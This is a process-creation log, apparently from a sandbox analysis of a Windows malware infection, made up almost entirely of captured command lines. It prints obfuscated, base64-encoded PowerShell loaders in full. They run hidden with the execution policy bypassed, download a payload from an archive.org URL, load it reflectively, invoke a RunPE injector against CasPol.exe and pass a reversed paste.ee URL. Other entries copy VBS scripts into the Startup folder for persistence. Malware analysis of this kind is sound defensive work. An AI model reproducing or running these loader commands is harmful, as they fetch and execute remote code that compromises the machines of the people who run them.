'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
